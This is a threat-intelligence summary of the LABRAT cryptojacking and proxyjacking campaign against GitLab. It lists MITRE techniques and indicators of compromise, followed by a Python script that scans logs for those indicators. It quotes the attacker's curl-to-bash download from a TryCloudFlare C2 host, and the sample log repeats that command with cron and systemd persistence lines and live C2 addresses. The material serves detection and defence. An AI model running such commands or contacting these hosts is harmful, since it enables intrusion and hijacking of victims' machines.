Sysdig Threat Research Team uncovered LABRAT, a stealthy, financially driven operation combining cryptomining and proxyjacking with multi-layer defense evasion targeting GitLab. The campaign uses undetected cross‑platform binaries, a TryCloudFlare‑based C2, a GSocket backdoor, and persistent techniques to stay hidden and monetize compromised hosts. #LABRAT #GitLab
Keypoints
- The LABRAT operation emphasizes stealth and defense evasion through compiled Go/.NET binaries rather than typical script-based malware.
- Initial access is gained by exploiting GitLab vulnerability CVE-2021-22205 to obtain remote code execution in a container.
- The attacker uses TryCloudFlare subdomains to obfuscate C2 hosting and employs a private GitLab repository to host malicious binaries.
- Persistence and lateral movement are achieved via a file dropper, creation of a new service, and cron-based scheduled tasks, with harvested SSH keys used to reach other hosts.
- LABRAT includes a backdoor (GSocket) with TLS-based C2 and the ability to use TOR, enabling stealthy communications.
- Cryptomining and proxyjacking are the primary monetization goals, with hard-coded mining pools and proxyware components.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – “The attacker gained initial access to a container by exploiting the known GitLab vulnerability, CVE-2021-22205.”
- [T1105] Ingress Tool Transfer – “The attacker executed the following command in order to download a malicious script from the C2 server.” – “curl -kL -u lucifer:369369 https://passage-television-gardening-venue[.]trycloudflare.com/v3 | bash”
- [T1053.005] Cron Jobs – “Modify various cron files to maintain persistence.”
- [T1543.003] Create or Modify System Process: Linux Service – “Create a new service with one of these binaries and if root, ran it on the fly.”
- [T1021.004] SSH – “Gather SSH keys to connect to those machines and start the process again, doing lateral movement.”
- [T1090] Proxy – “The attacker attempted to obfuscate their C2 location by creating subdomains on trycloudflare[.]com.”
- [T1496] Resource Hijacking – “to generate income, the attacker deployed both cryptomining and Russian-affiliated proxyjacking scripts.”
- [T1071.001] Web Protocols – “The library then negotiates a secure end-to-end TLS connection. The GSRN sees only the encrypted traffic.”
- [T1014] Rootkit – “kernel-based rootkits to hide their presence.”
- [T1027] Obfuscated/Compressed Files and Information – “The technique used to obfuscate the DLL is called Control Flow Flattening (CFF) …”
- [T1068] Exploitation for Privilege Escalation – “The m binary attempted to use the pwnkit vulnerability (CVE-2021-4034) to gain root access.”
- [T1552.001] Private Keys – “gather SSH keys to connect to those machines…” (credential access via private keys)
Indicators of Compromise
- [IP] context – 192.227.165.88:6666, 172.245.226.47:5858, 23.94.204.157:44445, and 23.94.204.157:7773
- [Domain] context – desertplanets.com:6666, separate-discussing-refrigerator-field[.]trycloudflare.com, passage-television-gardening-venue[.]trycloudflare.com, coffee-abandoned-predicted-skype[.]trycloudflare.com, karma-adopt-income-jeffrey[.]trycloudflare.com
- [File hash] context – m:10512112e62cd1cffee4e167651897970d7fef2c004fd784addcbcd23376ea22, v4:846ef36e262ce34203ca82ec84b95ae7bd316d162ee184845fda7b957e22b640, bs.zip:00df3dc4fe3a1c12acf3180d097ca88e0219331ae5cb6989fa4c3262597a2aba
- [File hash] context – f_ab.tar.gz:96db518610ef5c4b08d454a0f931db619fa09d193ac05b10d5600d4652af6ee3, f_aa.tar.gz:519ca08cc6b08b027441cd95dcb7ee5be6f9328a24687ab770a65e9246e8d4e9, f_aa:06ebe58e033b9228124a0575fddd6d2fde03afceef9ae030c92cb6640e3baebf
- [File name] context – api, booster, db, d.sh, deploy.sh, m, initd, netcoreapp-latest.tar, kms, puga, xorg
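As an added defender-side example (not from the Sysdig report), a small Python triage script that flags the command-line patterns from the MITRE list above and the network indicators from the IoC list in process-execution logs; the log lines it scans are constructed, and the rule regexes are my own heuristics rather than Sysdig's detections.

```python
import re

# Network IoCs quoted in the summary, un-defanged so they match raw log text.
C2_ENDPOINTS = {
    "192.227.165.88:6666", "172.245.226.47:5858",
    "23.94.204.157:44445", "23.94.204.157:7773", "desertplanets.com:6666",
}
C2_DOMAINS = {
    "separate-discussing-refrigerator-field.trycloudflare.com",
    "passage-television-gardening-venue.trycloudflare.com",
    "coffee-abandoned-predicted-skype.trycloudflare.com",
    "karma-adopt-income-jeffrey.trycloudflare.com",
}

# Heuristic rules (my own): MITRE id, short name, regex over the command line.
RULES = [
    ("T1105", "download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b")),
    ("T1090", "trycloudflare tunnel host",
     re.compile(r"\b[a-z0-9-]+\.trycloudflare\.com\b", re.I)),
    ("T1053.005", "cron persistence",
     re.compile(r"(/etc/cron[.\w]*|/var/spool/cron|\bcrontab\s+-)")),
    ("T1543.003", "systemd service creation",
     re.compile(r"(/etc/systemd/system/\S+\.service|\bsystemctl\s+(enable|daemon-reload)\b)")),
]
# host:port tokens (IPv4 or DNS name) for matching against the C2 endpoint list.
HOST_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9.-]+\.[a-z]{2,}):(\d{1,5})\b", re.I)


def classify(cmdline: str) -> list[str]:
    """Return the rule names and IoC matches for one process command line."""
    hits = [f"{tid} {name}" for tid, name, rx in RULES if rx.search(cmdline)]
    for host, port in HOST_RE.findall(cmdline):
        if f"{host.lower()}:{port}" in C2_ENDPOINTS:
            hits.append("IOC known C2 endpoint")
    if any(d in cmdline.lower() for d in C2_DOMAINS):
        hits.append("IOC known trycloudflare subdomain")
    return hits


def scan(lines):
    """Return (line_number, hits) for every log line that matched at least one rule."""
    results = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            results.append((n, hits))
    return results


# Constructed exec-log sample: line 1 is the download command quoted in the report.
SAMPLE_LOG = [
    "curl -kL -u lucifer:369369 https://passage-television-gardening-venue.trycloudflare.com/v3 | bash",
    "echo '* * * * * /tmp/d.sh' > /etc/cron.d/xorg",
    "cp /tmp/initd /etc/systemd/system/initd.service && systemctl enable initd",
    "ls -la /var/log",
    "./api -s 192.227.165.88:6666",
]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```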
Read more: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/